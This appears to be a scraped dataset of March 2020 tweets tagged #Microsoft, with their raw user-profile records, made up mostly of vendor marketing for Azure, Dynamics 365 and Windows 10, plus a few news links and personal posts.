    <t>{'id': 1109325591608614912, 'id_str': '1109325591608614912', 'name': 'NOLA Defense', 'screen_name': 'noladefense', 'location': '', 'description': 'Bot-based phishing site watch.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 117, 'friends_count': 50, 'listed_count': 6, 'created_at': 'Sat Mar 23 05:26:46 +0000 2019', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 619, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1159841382241935361/Bo9QjACR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159841382241935361/Bo9QjACR_normal.png',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</si>
  <si>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00:13:49 +0000 2020</t>
  </si>
  <si>
    <t>100 ways to use Yammer #Microsoft  https://t.co/hPy1x6gPod</t>
  </si>
  <si>
    <t>Wed Mar 04 00:11:38 +0000 2020</t>
  </si>
  <si>
    <t>Want to know how Azure Bastion works?  I've put together a brief post and linked some samples on Github
https://t.co/gsDfUDczvX
#Microsoft #Azure #AzureBastion #AzureFamily</t>
  </si>
  <si>
    <t>Wed Mar 04 00:10:08 +0000 2020</t>
  </si>
  <si>
    <t>#google and #microsoft are giving away enterprise conferencing tools due to coronavirus https://t.co/fF2aUmfXvY https://t.co/SHH60IvLjQ</t>
  </si>
  <si>
    <t>Wed Mar 04 00:10:03 +0000 2020</t>
  </si>
  <si>
    <t>Why #Microsoft Is Making Sure You Dont Have To Buy Its New Xbox  Forbes https://t.co/hEneTwh8Ey #TechJunkieNews https://t.co/wKOEqvtoWh</t>
  </si>
  <si>
    <t>Wed Mar 04 00:09:31 +0000 2020</t>
  </si>
  <si>
    <t>Don't forget to check out my remix to Cuphead's "Floral Furry" 
https://t.co/dzCbtn7vIC
Enjoy
#Cuphead
#VideoGames
#Games
#RunAndGun
#Xbox
#XboxOne
#Microsoft
#Nintendo
#Switch
#NintendoSwitch
#StudioMDHR
#KingDice
#Mugman
#FloralFury
#CagneyCarnation
#NewMusic</t>
  </si>
  <si>
    <t>{'id': 54323426, 'id_str': '54323426', 'name': 'O z z i e n t', 'screen_name': 'ozzient', 'location': 'Illinois, USA', 'description': 'SERIOUS INQUIRIES ONLY: OzzientMusic@gmail.com\nProducer/Artist/Beatboxer/Pianist/Designer\nã€°ï¸ O z z i e n t ã€°ï¸\nhttps://t.co/tOtymVgfHX #MusicProducer #Beatboxer', 'url': 'https://t.co/FJlNrTb1tB', 'entities': {'url': {'urls': [{'url': 'https://t.co/FJlNrTb1tB', 'expanded_url': 'http://www.youtube.com/c/Ozzient', 'display_url': 'youtube.com/c/Ozzient', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/tOtymVgfHX', 'expanded_url': 'http://soundcloud.com/ozzient', 'display_url': 'soundcloud.com/ozzient', 'indices': [110, 133]}]}}, 'protected': False, 'followers_count': 592, 'friends_count': 630, 'listed_count': 8, 'created_at': 'Mon Jul 06 20:32:40 +0000 2009', 'favourites_count': 2989, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1715,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'http://pbs.twimg.com/profile_images/998024223443451904/rnKGZBL6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/998024223443451904/rnKGZBL6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54323426/1562629857',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</si>
  <si>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Mar 04 00:09:22 +0000 2020</t>
  </si>
  <si>
    <t>Oh my welcome knight! Let's finally sin with you! I promise not to break your sword #Escondido   #nature #microsoft https://t.co/dNFtu1rJq7</t>
  </si>
  <si>
    <t>{'id': 1234939660159397890, 'id_str': '1234939660159397890', 'name': 'Liz Happenings', 'screen_name': 'flanamenca', 'location': 'Akron, USA', 'description': 'Love doesnâ€™t make the world go â€™round. Love is what makes the ride worthwhile', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 34, 'listed_count': 0, 'created_at': 'Tue Mar 03 20:32:20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'http://pbs.twimg.com/profile_images/1234949275924213762/nrKXkplk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234949275924213762/nrKXkplk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234939660159397890/1583269860',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</si>
  <si>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Mar 04 00:08:04 +0000 2020</t>
  </si>
  <si>
    <t>#Windows10 #Microsoft #Techoxin #USA 
How to upgrade Windows 10 Home to Windows 10 Pro
https://t.co/UaAS1wuvPm https://t.co/fBvGcuMN8u</t>
  </si>
  <si>
    <t>{'id': 1211689250669748225, 'id_str': '1211689250669748225', 'name': 'Techoxin', 'screen_name': 'techoxin', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Mon Dec 30 16:44:02 +0000 2019', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1230016797589438464/XlG9Hdz__normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230016797589438464/XlG9Hdz__normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1211689250669748225/1582093834',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</si>
  <si>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Mar 04 00:05:07 +0000 2020</t>
  </si>
  <si>
    <t>Constant news and improvements in the world of AI and Machine Learning.
#AI #MachineLearning #Azure #Microsoft
https://t.co/2ROhtQ2EcP</t>
  </si>
  <si>
    <t>Wed Mar 04 00:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that you can get paid to use Bing as your search engine? Here's what you need to know about Microsoft Rewards (and how to earn 'em faster too). Check it out: https://t.co/gg2Tr6YRbq #microsoft #bing https://t.co/VR0gMwTulH</t>
  </si>
  <si>
    <t>Tue Mar 03 23:58:37 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Boxes  of amazing donuts for our App in a Day attendees! 
#nomnom #donuts #canada #appinaday #powerapps #PowerAutomate #PowerPlatform #powerbi #microsoft #MicrosoftFlow #fidelityfactory https://t.co/qlVXwiJzmh</t>
  </si>
  <si>
    <t>{'id': 841606375683821568, 'id_str': '841606375683821568', 'name': 'FlowJoe #AutomateAddict', 'screen_name': 'Flow_Joe_', 'location': 'Vancouver, British Columbia', 'description': 'Hi Iâ€™m Joe. PowerAutomate/Flow something something. ðŸ‡¨ðŸ‡¦', 'url': 'https://t.co/fUlvHvZ480', 'entities': {'url': {'urls': [{'url': 'https://t.co/fUlvHvZ480', 'expanded_url': 'https://www.flowjoe.io', 'display_url': 'flowjoe.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1066, 'friends_count': 502, 'listed_count': 25, 'created_at': 'Tue Mar 14 11:06:11 +0000 2017', 'favourites_count': 1800, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 527, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1113819112852140032/F7SUUJOE_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113819112852140032/F7SUUJOE_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/841606375683821568/1561754363',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</si>
  <si>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23:56:18 +0000 2020</t>
  </si>
  <si>
    <t>Test Tweet as part of my @MicrosoftLearn Module 'Get Started with Power Automate' #Microsoft #PowerAutomate #MSFTMate https://t.co/ZwFIuON7Mn</t>
  </si>
  <si>
    <t>{'id': 529355107, 'id_str': '529355107', 'name': 'Microsoft Mate', 'screen_name': 'MSFTMate', 'location': 'Brisbane, Queensland', 'description': 'Experienced consultant primarily focused on #Microsoft #Dynamics365 for Sales, Customer Service, Field Service and Project Service.', 'url': 'https://t.co/xtye85HjEn', 'entities': {'url': {'urls': [{'url': 'https://t.co/xtye85HjEn', 'expanded_url': 'http://msftmate.com', 'display_url': 'msftmate.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 60, 'friends_count': 57, 'listed_count': 4, 'created_at': 'Mon Mar 19 12:46:14 +0000 2012', 'favourites_count': 153, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 143,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'http://pbs.twimg.com/profile_images/936472314266316800/HqZChpoj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/936472314266316800/HqZChpoj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/529355107/1511176863',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</si>
  <si>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23:54:02 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact Sundown Solutions to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/d4C2rF87n0</t>
  </si>
  <si>
    <t>{'id': 728616219587137536, 'id_str': '728616219587137536', 'name': 'Sundown Solutions US', 'screen_name': 'SundownSolUS', 'location': 'Dallas, TX', 'description': 'We provide solutions using the latest in platform agnostic technologies, allowing us to build your web site, mobile app, or intranet quickly and beautifully.', 'url': 'https://t.co/2amyS8EqFz', 'entities': {'url': {'urls': [{'url': 'https://t.co/2amyS8EqFz', 'expanded_url': 'https://sundown.solutions', 'display_url': 'sundown.solutions', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 43, 'friends_count': 121, 'listed_count': 2, 'created_at': 'Fri May 06 16:03:38 +0000 2016', 'favourites_count': 203, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 617, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/986112720423366656/UdKB5gAL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/986112720423366656/UdKB5gAL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/728616219587137536/1505856650',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</si>
  <si>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23:51:52 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft invested over $1 billion into developing top-notch security for their cloud so you don't have to. Run your server and store your data with confidence on #Azure. https://t.co/cfXcDTxzhw</t>
  </si>
  <si>
    <t>{'id': 705584490928693248, 'id_str': '705584490928693248', 'name': 'NUBELITY', 'screen_name': 'nubelity', 'location': '', 'description': "Solutions for Businesses: Your own path to the Cloud. Let us help you develop a #cloud strategy that targets your company's specific goals. #GetCloudDone!", 'url': 'https://t.co/FphltkcCh8', 'entities': {'url': {'urls': [{'url': 'https://t.co/FphltkcCh8', 'expanded_url': 'http://www.nubelity.com', 'display_url': 'nubelity.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 104, 'friends_count': 170, 'listed_count': 109, 'created_at': 'Fri Mar 04 02:43:46 +0000 2016', 'favourites_count': 437, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1523, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/715718737505046528/W7p5GpK2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/715718737505046528/W7p5GpK2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/705584490928693248/1459476618',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</si>
  <si>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23:51:34 +0000 2020</t>
  </si>
  <si>
    <t>With SQL Server 2017 and Azure Data Services, your business has the opportunity to transform and stand out among the competition. Contact ContentMX Support to learn more about how you can make #Microsoft Azure work for you. https://t.co/0cVHVLWm7S</t>
  </si>
  <si>
    <t>{'id': 195738722, 'id_str': '195738722', 'name': 'Sample Partner', 'screen_name': 'samplepartner', 'location': '', 'description': '', 'url': 'http://t.co/YVpiFts2sa', 'entities': {'url': {'urls': [{'url': 'http://t.co/YVpiFts2sa', 'expanded_url': 'http://butterflypublisher.com', 'display_url': 'butterflypublisher.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 2, 'listed_count': 2, 'created_at': 'Mon Sep 27 13:25:36 +0000 2010', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2139,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'http://pbs.twimg.com/profile_images/1317330756/Screen_shot_2011-04-14_at_9.34.21_AM_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1317330756/Screen_shot_2011-04-14_at_9.34.21_AM_normal.png',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</si>
  <si>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23:51:32 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/kWER7Cwriu</t>
  </si>
  <si>
    <t>{'id': 107484294, 'id_str': '107484294', 'name': 'Bross Group', 'screen_name': 'brossgroup', 'location': 'Denver Metro Area', 'description': 'Bross Group is a premier IT Consulting Firm. Delivering Results and Exceeding Expectations by simplifying IT Complexity', 'url': 'http://t.co/5BOCYUC5wk', 'entities': {'url': {'urls': [{'url': 'http://t.co/5BOCYUC5wk', 'expanded_url': 'http://www.brossgroup.com', 'display_url': 'brossgroup.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 310, 'friends_count': 1436, 'listed_count': 10, 'created_at': 'Fri Jan 22 18:23:47 +0000 2010', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4516,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'http://pbs.twimg.com/profile_images/1126904564962082816/yvbJTXOI_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126904564962082816/yvbJTXOI_normal.png', 'profile_link_color': '0D5173',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</si>
  <si>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23:51:11 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/eM3bye9i4q</t>
  </si>
  <si>
    <t>Tue Mar 03 23:50:52 +0000 2020</t>
  </si>
  <si>
    <t>Credentials are the Achilles heel of cybersecurity. With #Microsoft 365 Advanced Threat Protection, Lenco Technologies LLC reduces your risk. https://t.co/cLxdLcxdoG</t>
  </si>
  <si>
    <t>{'id': 988832134176571393, 'id_str': '988832134176571393', 'name': 'Leonard Vassell', 'screen_name': 'lencotech', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 14, 'friends_count': 15, 'listed_count': 1, 'created_at': 'Tue Apr 24 17:28:47 +0000 2018', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 732, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/988838092705550338/HnI7OWlm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/988838092705550338/HnI7OWlm_normal.jpg',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</si>
  <si>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23:49:40 +0000 2020</t>
  </si>
  <si>
    <t>Had some fun yesterday training #Microsoft #Access. Poor #Access doesn't get much mention online so I thought I'd share some #love. #Database #Switchboards #Queries #Reports #Forms @Office365 https://t.co/sjpaEgZQkf</t>
  </si>
  <si>
    <t>{'id': 2731450376, 'id_str': '2731450376', 'name': 'The Training Lady', 'screen_name': 'traininglady1', 'location': 'Sydney, Australia', 'description': 'Huge fan of all things #Microsoft &amp; #WordPress.. We come to you for customised training available within Sydney. https://t.co/ntcsL72Wj4 https://t.co/7kJlW3sSrd', 'url': 'https://t.co/Or0qrNg73m', 'entities': {'url': {'urls': [{'url': 'https://t.co/Or0qrNg73m', 'expanded_url': 'http://thetraininglady.com', 'display_url': 'thetraininglady.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ntcsL72Wj4', 'expanded_url': 'http://www.thetraininglady.com', 'display_url': 'thetraininglady.com', 'indices': [113, 136]}, {'url': 'https://t.co/7kJlW3sSrd', 'expanded_url': 'http://www.beltan.com.au', 'display_url': 'beltan.com.au', 'indices': [137, 160]}]}}, 'protected': False, 'followers_count': 143, 'friends_count': 251, 'listed_count': 5, 'created_at': 'Thu Aug 14 11:05:53 +0000 2014', 'favourites_count': 174, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 343,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'http://pbs.twimg.com/profile_images/971167238886576128/od6XVXNc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/971167238886576128/od6XVXNc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2731450376/1520379065', 'profile_link_color': '135280',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</si>
  <si>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Why do governments partner with a specific digital provider? It comes down to 4 main reasons. Learn why public digital transformation works best when powered by #Microsoft. https://t.co/0DMyeLux4V</t>
  </si>
  <si>
    <t>{'id': 41863933, 'id_str': '41863933', 'name': 'Computer SOS', 'screen_name': 'ComputerSOS', 'location': 'Buffalo, NY', 'description': 'Your total IT solutions company since 1995\nWebsite design &amp; hosting\nComputer sales &amp; service\nCustom Software &amp; Apps.\nPOS/ Inventory Control software \nAnd more!', 'url': 'https://t.co/ryYfcDGI2h', 'entities': {'url': {'urls': [{'url': 'https://t.co/ryYfcDGI2h', 'expanded_url': 'https://www.computersosinc.com', 'display_url': 'computersosinc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 135, 'friends_count': 468, 'listed_count': 9, 'created_at': 'Fri May 22 17:54:43 +0000 2009', 'favourites_count': 1297, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1861,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'http://pbs.twimg.com/profile_images/1016411857870041088/4qhA8BzF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1016411857870041088/4qhA8BzF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/41863933/1496780664',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</si>
  <si>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23:49:14 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft #Dynamics365 can help elevate and transform your customers' journey by creating consistent, personalized experiences. Subscribe today. https://t.co/q6xiR4PRix</t>
  </si>
  <si>
    <t>{'id': 4435872198, 'id_str': '4435872198', 'name': 'ZAACT Consulting', 'screen_name': 'ZAACTConsulting', 'location': 'Salt Lake City, UT', 'description': "ZAACT Consulting is a Gold Certified Microsoft Partner.  We provide Business Productivity solutions around Office365 and SharePoint. We'll connect your business", 'url': 'https://t.co/Zk5KY1GNeN', 'entities': {'url': {'urls': [{'url': 'https://t.co/Zk5KY1GNeN', 'expanded_url': 'http://www.zaact.com', 'display_url': 'zaact.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 96, 'friends_count': 209, 'listed_count': 6, 'created_at': 'Wed Dec 02 23:15:19 +0000 2015', 'favourites_count': 93, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 582,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'http://pbs.twimg.com/profile_images/1116691450752667648/QLJcCp81_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1116691450752667648/QLJcCp81_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4435872198/1567718172', 'profile_link_color': 'AC1E2D',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</si>
  <si>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23:49:13 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft #Dynamics365 can help elevate and transform your customers' journey by creating consistent, personalized experiences. Subscribe today. https://t.co/fd1G6pVcKW</t>
  </si>
  <si>
    <t>{'id': 30490001, 'id_str': '30490001', 'name': 'Kendall Matthews', 'screen_name': 'KendallMatthews', 'location': 'Phoenix, Arizona', 'description': 'ðŸ¤³founder of HassleFree800 business #software advisors and RampUp storyteller. Check out new case studiesðŸ‘‡ðŸ½', 'url': 'https://t.co/1499SGQry7', 'entities': {'url': {'urls': [{'url': 'https://t.co/1499SGQry7', 'expanded_url': 'http://www.kendallmatthews.com/bio-kendall-matthews/', 'display_url': 'kendallmatthews.com/bio-kendall-maâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1241, 'friends_count': 2328, 'listed_count': 264, 'created_at': 'Sat Apr 11 17:55:10 +0000 2009', 'favourites_count': 1097, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6702,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'http://pbs.twimg.com/profile_images/1043322469602349057/mIxX91Or_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1043322469602349057/mIxX91Or_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/30490001/1540051985', 'profile_link_color': '3B94D9',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</si>
  <si>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23:48:42 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/Tj5Ithiau7</t>
  </si>
  <si>
    <t>Tue Mar 03 23:48:23 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/n2DlgAX1gS</t>
  </si>
  <si>
    <t>Tue Mar 03 23:48:15 +0000 2020</t>
  </si>
  <si>
    <t>Do your #K12 students have the tools they need to be future-ready? Learn more about our affordable #Microsoft devices. Contact us to unlock the power of learning.#EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/WNELA92D99</t>
  </si>
  <si>
    <t>Tue Mar 03 23:48:09 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/G6fqnGoUSC</t>
  </si>
  <si>
    <t>{'id': 30109674, 'id_str': '30109674', 'name': 'Kevin Baylor', 'screen_name': 'kevinbaylor', 'location': 'Florida', 'description': 'IT geek, consultant, Harley guy, grandpa, father and husband', 'url': 'https://t.co/WO5tueE8VI', 'entities': {'url': {'urls': [{'url': 'https://t.co/WO5tueE8VI', 'expanded_url': 'http://www.allianceitllc.com', 'display_url': 'allianceitllc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 293, 'friends_count': 573, 'listed_count': 26, 'created_at': 'Fri Apr 10 00:34:28 +0000 2009', 'favourites_count': 53, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2278,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'http://pbs.twimg.com/profile_images/496745001833861120/GPxqronY_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/496745001833861120/GPxqronY_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/30109674/1547047569',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</si>
  <si>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Tue Mar 03 23:48:06 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/xoaonC9Wmj</t>
  </si>
  <si>
    <t>{'id': 3437040807, 'id_str': '3437040807', 'name': 'Granite Networks', 'screen_name': 'granitenetinc', 'location': 'Royal Oak, MI', 'description': 'We make IT work for you.Â®', 'url': 'https://t.co/bEojUc4VsE', 'entities': {'url': {'urls': [{'url': 'https://t.co/bEojUc4VsE', 'expanded_url': 'http://www.granitenetworks.com/', 'display_url': 'granitenetworks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 122, 'friends_count': 509, 'listed_count': 15, 'created_at': 'Sun Aug 23 19:14:47 +0000 2015', 'favourites_count': 951, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1160,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'http://pbs.twimg.com/profile_images/1125968495978713088/fno2PwCz_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125968495978713088/fno2PwCz_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3437040807/1440899259',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</si>
  <si>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23:47:49 +0000 2020</t>
  </si>
  <si>
    <t>Tired of being chained to your desk? Want to brush up on your digital skills? Check out this article to learn how you can #workremotely with help from #communication apps and tools. What are you waiting for? Get #Teamworksolutions from #Microsoft. https://t.co/O0z1ibpvpm</t>
  </si>
  <si>
    <t>{'id': 1077917584295673856, 'id_str': '1077917584295673856', 'name': 'Maryland Computer Service Inc.', 'screen_name': '4MCSInc', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Wed Dec 26 13:22:33 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 165, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1077917837463818241/dhjjjNJW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1077917837463818241/dhjjjNJW_normal.jpg',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</si>
  <si>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23:46:29 +0000 2020</t>
  </si>
  <si>
    <t>Google and Microsoft are giving away enterprise conferencing tools due to coronavirus https://t.co/GXpMe8DeZr #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 23:45:12 +0000 2020</t>
  </si>
  <si>
    <t>Former #Microsoft Software Engineer Convicted of Fraud https://t.co/xVHqAtvZgd #DarkReading</t>
  </si>
  <si>
    <t>Tue Mar 03 23:45:08 +0000 2020</t>
  </si>
  <si>
    <t>#google and #microsoft are giving away enterprise conferencing tools due to coronavirus https://t.co/E3V9FfgU5x https://t.co/UGE42rRngL</t>
  </si>
  <si>
    <t>Tue Mar 03 23:44:39 +0000 2020</t>
  </si>
  <si>
    <t>Watch how @wildandwolf transformed their business with #MSDyn365 by providing employees a single platform in the cloud. #Microsoft #Technology #IT #BusinessAutomation https://t.co/AqsvozgFxu</t>
  </si>
  <si>
    <t>{'id': 973213382, 'id_str': '973213382', 'name': 'TeKnowNOW', 'screen_name': 'TeKnowNow', 'location': 'Dallas, TX', 'description': '#BusinessITSupport, #Cloudscaping, #Hosting. #MicrosoftSilverPartner #LenovoBusinessPartner Based in #DFW IT Services, Consulting, and Managed Services.', 'url': 'https://t.co/CT2fW0jPBm', 'entities': {'url': {'urls': [{'url': 'https://t.co/CT2fW0jPBm', 'expanded_url': 'http://www.teknownow.com', 'display_url': 'teknownow.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 585, 'friends_count': 758, 'listed_count': 19, 'created_at': 'Tue Nov 27 03:57:28 +0000 2012', 'favourites_count': 1013, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4891,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'http://pbs.twimg.com/profile_images/1229280762257694720/KaIb3zAg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229280762257694720/KaIb3zAg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/973213382/1582653447',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</si>
  <si>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23:44:16 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft #redhat     Are you looking to upgrade your IT infrastructure but worry about migrating your open-source solutions? Now, you can easily shift your current subscriptions like @RedHat to Azure. https://t.co/uQajZ8KbBu</t>
  </si>
  <si>
    <t>Tue Mar 03 23:44:12 +0000 2020</t>
  </si>
  <si>
    <t>Connectivity is at the Heart of Powering a Digitally Transformed Europe https://t.co/nAYvxEoYFD
For more info: https://t.co/IymcHJvero #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings https://t.co/3oG8oGrJs0</t>
  </si>
  <si>
    <t>fu*king windows ink
#Microsoft #windows10</t>
  </si>
  <si>
    <t>{'id': 350781668, 'id_str': '350781668', 'name': 'ë½ì„ ìƒ rock', 'screen_name': 'Route666rock', 'location': 'ë‚œìž¥ê°• ë¬´ ë°­ì— ë–¨ì–´ì§„ ë¶ˆíƒ€ëŠ” íƒ€ì´íŒŒì´í„° ì•ˆì˜ í˜„ìƒ', 'description': 'ë½ìž…ë‹ˆë‹¤/ìœ¼ë¥¸ì´/ì‚¬ë‹´ë§ŽìŒ/DC, ë§ˆë¸” ì‹œë„¤ë§ˆí‹±, ìŠ¤íƒ€ì›Œ...ì¦ˆ..../ê³ ì–‘ì´ë©ë©ì´ê³°ì• í˜¸ê°€/ korean/japanese ok/mdzs ë§ˆë„ì¡°ì‚¬,ì§„ì •ë ¹ ë³´ëŠ” ì¤‘/ìŠ¤í¬ë§Žì•„ìš”/í•´ì¹˜ì§€ì•Šì•„ìš”/FUB FREE', 'url': 'https://t.co/KkWNGWQLAa', 'entities': {'url': {'urls': [{'url': 'https://t.co/KkWNGWQLAa', 'expanded_url': 'https://polarbear-in-crscntmoon.postype.com/', 'display_url': 'polarbear-in-crscntmoon.postype.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 23, 'friends_count': 50, 'listed_count': 1, 'created_at': 'Mon Aug 08 09:13:14 +0000 2011', 'favourites_count': 328, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8233,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'http://pbs.twimg.com/profile_images/1207556405328150528/auaNoxGi_normal.jpg', 